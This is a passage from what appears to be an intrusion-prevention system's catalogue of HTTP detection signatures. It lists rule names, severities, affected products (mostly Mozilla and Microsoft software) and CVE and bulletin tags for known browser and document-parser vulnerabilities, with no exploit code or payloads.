HTTP_SS-Microsoft-Works-File-Converter-WPS-File-Field-Length-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Works detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Works, MS2008-02, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Microsoft-Works-File-Converter-WPS-File-Field-Length-Stack-Overflow
Description:
Back to top

HTTP_SS-Microsoft-Works-File-Converter-WPS-FileSectionHeaderIndexTable-StackOF

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Works, MS2008-02, CVE2008, Windows not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Microsoft-Works-File-Converter-WPS-FileSectionHeaderIndexTable-StackOF
Description:
Back to top

HTTP_SS-Microsoft-Works-FileConverter-WPS-FileSectionLengthHeaders-MemCorrupt

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Works, MS2008-02, CVE2007, Windows not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Microsoft-Works-FileConverter-WPS-FileSectionLengthHeaders-MemCorrupt
Description:
Back to top

HTTP_SS-Microsoft-Xml-Core-Services-ActiveX-Control-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft XML Core Services detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft XML Core Services, MS2006-11, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-279-4219
Vulnerability: HTTP-Microsoft-Xml-Core-Services-ActiveX-Control-Code-Exectution
Description:
Back to top

HTTP_SS-Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure

About this situation: Attempt to exploit a vulnerability in Microsoft XML Core Services detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft XML Core Services, MS2008-11, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-187-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure
Description:
Back to top

HTTP_SS-Microsoft-Xml-Core-Services-ParseError-DOM-Object-Information-Disclosure

About this situation: Attempt to exploit a vulnerability in Microsoft XML Core Services detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft XML Core Services, MS2008-11, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-186-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Microsoft-Xml-Core-Services-ParseError-DOM-Object-Information-Disclosure
Description:
Back to top

HTTP_SS-Microsoft-XML-Editor-External-Entities-Resolution-CVE-2011-1280

About this situation: Detected attempt to exploit a vulnerability in Microsoft XML Editor
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft SQL Server 2005, Microsoft InfoPath 2007, Microsoft SQL Server 2008, Microsoft Visual Studio 2008, MS2011-06, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-XML-Editor-External-Entities-Resolution-CVE-2011-1280
Description:
Back to top

HTTP_SS-Microsoft-XMLHTTP-ActiveX-Control-Code-Execution

About this situation: Attempt to exploit a code execution vulnerability in the XMLHTTP ActiveX Control included with Microsoft XML Core Services detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft XML Core Services, MS2006-11, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-173-2032
Vulnerability: Microsoft-XMLHTTP-ActiveX-Control-Code-Execution
Description:
Back to top

HTTP_SS-Mime-Formatted-Request-Vulnerability-CVE-2011-1894

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-06, CVE2011, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-396-4219
Vulnerability: Microsoft-Mime-Formatted-Request-Vulnerability-CVE-2011-1894
Description:
Back to top

HTTP_SS-mIRC-IRC-URI-Protocol-Handler-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in mIRC detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, mIRC, CVE2003, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-262-3038
Vulnerability: mIRC-IRC-URI-Protocol-Handler-Buffer-Overflow
Description:
Back to top

HTTP_SS-Mozilla-Browsers-onUnload-Event-Handler-Memory-Corruption

About this situation: Detected an attempt to exploit a vulnerability in Mozilla Firefox and Seamonkey
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Mozilla-Browsers-onUnload-Event-Handler-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-CSS-Border-Memory-Corruption

About this situation: Detected an attempt to exploit a vulnerability in Mozilla
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Suite, Mozilla Thunderbird, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-354-4219
Vulnerability: Mozilla-CSS-Border-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Firefox-Animated-PNG-Processing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Mozilla-Firefox-Animated-PNG-Processing-Integer-Overflow
Description:
Back to top

HTTP_SS-Mozilla-Firefox-Browser-Engine-Memory-Corruption

About this situation: Attempt to exploit a vulnerability in Mozilla Foundation Firefox
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-229-3038
Last changed: sgpkg-ips-229-3038
Vulnerability: Mozilla-Firefox-Browser-Engine-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Firefox-Cleartextrun-Function-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-221-3038
Last changed: sgpkg-ips-221-3038
Vulnerability: Mozilla-Firefox-Cleartextrun-Function-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption

About this situation: Detected attempt to exploit a vulnerability in Mozilla Firefox
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-393-4219
Last changed: sgpkg-ips-393-4219
Vulnerability: Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption-2

About this situation: Detected attempt to exploit a vulnerability in Mozilla Firefox
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-393-4219
Last changed: sgpkg-ips-393-4219
Vulnerability: Mozilla-Firefox-document.write-And-DOM-Insertions-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Firefox-FirefoxURL-URI-Handler-Registration-Code-Execution

About this situation: Crafted HTML page with malicious arguments passed to the vulnerable "FirefoxURL://" handler detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla Firefox, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Mozilla-Firefox-FirefoxURL-URI-Handler-Registration-Code-Execution
Description:
Back to top

HTTP_SS-Mozilla-Firefox-Floating-Point-Number-Conversion-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-377-4219
Vulnerability: Mozilla-Firefox-Floating-Point-Number-Conversion-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Firefox-JavaScript-Array.splice-Memory-Corruption

About this situation: An attempt to exploit memory corruption vulnerability in Mozilla Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-218-3038
Vulnerability: Mozilla-Firefox-JavaScript-Array.splice-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Firefox-JavaScript-Function-Focus-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2006, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Mozilla-Firefox-JavaScript-Function-Focus-Buffer-Overflow
Description:
Back to top

HTTP_SS-Mozilla-Firefox-Layout-Frame-Constructor-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in Mozilla Firefox products detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2007, Any Operating System not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Mozilla-Firefox-Layout-Frame-Constructor-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Firefox-nsPropertyTable-PropertyList-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Mozilla Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-342-4219
Vulnerability: Mozilla-Firefox-nsPropertyTable-PropertyList-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Firefox-nsTreeRange-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox Detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Mozilla-Firefox-nsTreeRange-Use-After-Free
Description:
Back to top

HTTP_SS-Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-250-3038
Vulnerability: Mozilla-Firefox-PKCS11-Module-Installation-Code-Execution
Description:
Back to top

HTTP_SS-Mozilla-Firefox-Plugin-Parameter-Array-Dangling-Pointer

About this situation: An attempt to exploit a code execution vulnerability in Mozilla Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-326-4219
Last changed: sgpkg-ips-377-4219
Vulnerability: Mozilla-Firefox-Plugin-Parameter-Array-Dangling-Pointer
Description:
Back to top

HTTP_SS-Mozilla-Firefox-Top-Level-Script-Object-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Mozilla-Firefox-Top-Level-Script-Object-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Firefox-Tracemonkey-Escape-Function-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-232-3038
Last changed: sgpkg-ips-233-3038
Vulnerability: Mozilla-Firefox-Tracemonkey-Escape-Function-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Firefox-Unicode-Data-Denial-Of-Service

About this situation: An attempt to exploit a denial of service vulnerability in Mozilla Firefox detected
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-233-3038
Last changed: sgpkg-ips-233-3038
Vulnerability: Mozilla-Firefox-Unicode-Data-Denial-Of-Service
Description:
Back to top

HTTP_SS-Mozilla-Firefox-Utf8-Url-Handling-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Mozilla-Firefox-Utf8-Url-Handling-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Mozilla-Firefox-Woff-Font-Processing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-297-4219
Last changed: sgpkg-ips-297-4219
Vulnerability: Mozilla-Firefox-Woff-Font-Processing-Integer-Overflow
Description:
Back to top

HTTP_SS-Mozilla-Firefox-XBL-Event-Handler-Tags-Removal-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2007, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-377-4219
Vulnerability: Mozilla-Firefox-XBL-Event-Handler-Tags-Removal-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-JavaScript-String-Replace-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-297-4219
Last changed: sgpkg-ips-356-4219
Vulnerability: Mozilla-JavaScript-String-Replace-Buffer-Overflow
Description:
Back to top

HTTP_SS-Mozilla-Products-Ensurecachedattrparamarrays-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Mozilla-Products-Ensurecachedattrparamarrays-Integer-Overflow
Description:
Back to top

HTTP_SS-Mozilla-Products-Frame-Comment-Objects-Manipulation-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Firefox/SeaMonkey browsers detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-267-3038
Vulnerability: HTTP-Mozilla-Products-Frame-Comment-Objects-Manipulation-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Products-Malformed-Gif-Buffer-Overflow

About this situation: Malicious GIF image detected
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Mozilla Suite, Mozilla Thunderbird, CVE2005, Any Operating System not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Mozilla-Products-Malformed-Gif-Buffer-Overflow
Description:
Back to top

HTTP_SS-Mozilla-Products-MathML-Integer-Overflow

About this situation: Detected an attempt to exploit Mozilla based browsers
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-354-4219
Vulnerability: Mozilla-Products-MathML-Integer-Overflow
Description:
Back to top

HTTP_SS-Mozilla-Products-QueryInterface-Method-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla based products detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2006, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-134-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Mozilla-Products-QueryInterface-Method-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Products-SVG-Layout-Engine-Index-Parameter-Memory-Corruption

About this situation: Attempt to exploit a memory corruption vulnerability in Mozilla Foundation's family of browser products detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Mozilla-Products-SVG-Layout-Engine-Index-Parameter-Memory-Corruption
Description:
Back to top

HTTP_SS-Mozilla-Products-SVG-Rendering-Engine-Integer-Overflow

About this situation: Exploit against integer overflow vulnerability in Scalable Vector Graphics rendering engine in Mozilla products
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Mozilla Suite, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Mozilla-Products-SVG-Rendering-Engine-Integer-Overflow
Description:
Back to top

HTTP_SS-Mozilla-SVG-Data-Processing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-211-2032
Vulnerability: Mozilla-SVG-Data-Processing-Memory-Corruption
Description:
Back to top

HTTP_SS-MPlayer-TwinVQ-File-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MPlayer detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MPlayer, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-225-3038
Last changed: sgpkg-ips-225-3038
Vulnerability: MPlayer-TwinVQ-File-Handling-Buffer-Overflow
Description:
Back to top

HTTP_SS-MS-Forefront-UAG-Poisoned-Cup-Of-Code-Execution-Vulnerability

About this situation: Attempt to exploit a vulnerability in Microsoft Forefront UAG detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Forefront Unified Access Gateway, MS2011-10, CVE2011, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-417-4219
Vulnerability: MS-Forefront-UAG-Poisoned-Cup-Of-Code-Execution-Vulnerability
Description:
Back to top

HTTP_SS-MS-Internet-Explorer-Select-Element-Remote-Code-Execution

About this situation: Attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2011-10, CVE2011, Windows not specific, Internet Explorer not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-417-4219
Last changed: sgpkg-ips-417-4219
Vulnerability: MS-Internet-Explorer-Select-Element-Remote-Code-Execution
Description:
Back to top

HTTP_SS-Multiple-Vendor-Libwpd-Wp3tablesgroup-Heap-Overflow

About this situation: An attempt to exploit a vulnerability in libwpd Project WordPerfect Document Importer/Exporter (libwpd) detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, libwpd Project WordPerfect Document Importer/Exporter (libwpd), AbiSource AbiWord, CVE2007, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Multiple-Vendor-Libwpd-Wp3tablesgroup-Heap-Overflow
Description:
Back to top

HTTP_SS-Multiple-Vendor-PDF-Reader-Catlog-Handling

About this situation: An attempt to exploit a vulnerability in PDF readers from multiple vendors detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple Preview, Adobe Reader, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-248-3038
Vulnerability: Multiple-Vendor-PDF-Reader-Catlog-Handling
Description:
Back to top

HTTP_SS-MW6-Technologies-Barcode-ActiveX-Control-Buffer-Overflow

About this situation: Detected an attempt to exploit a vulnerability in MW6 Technologies Barcode ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MW6 Technologies Barcode ActiveX, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-325-4219
Vulnerability: MW6-Technologies-Barcode-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-NCTsoft-NCTAudioFile2-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NCTsoft NCTAudioFile2 ActiveX control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, NCTsoft NCTAudioStudio, NCTsoft NCTDialogicVoice, NCTsoft NCTAudioEditor, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-NCTsoft-NCTAudioFile2-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-NewsGator-FeedDemon-OPML-Outline-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in NewsGator FeedDaemon
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, NewsGator FeedDemon, CVE2009, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: NewsGator-FeedDemon-OPML-Outline-Buffer-Overflow
Description:
Back to top

HTTP_SS-Norton-Internet-Security-2004-Symspam.dll-BOF

About this situation: An attempt to exploit a vulnerability in Symantec Norton Internet Security detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Norton Internet Security, CVE2004, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-370-4219
Vulnerability: Norton-Internet-Security-2004-Symspam.dll-BOF
Description:
Back to top

HTTP_SS-Novell-iPrint-Client-ActiveX-Control-ExecuteRequest-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in Novell iPrint Client for Windows detected
Context: HTTP Server Stream
Severity: 7
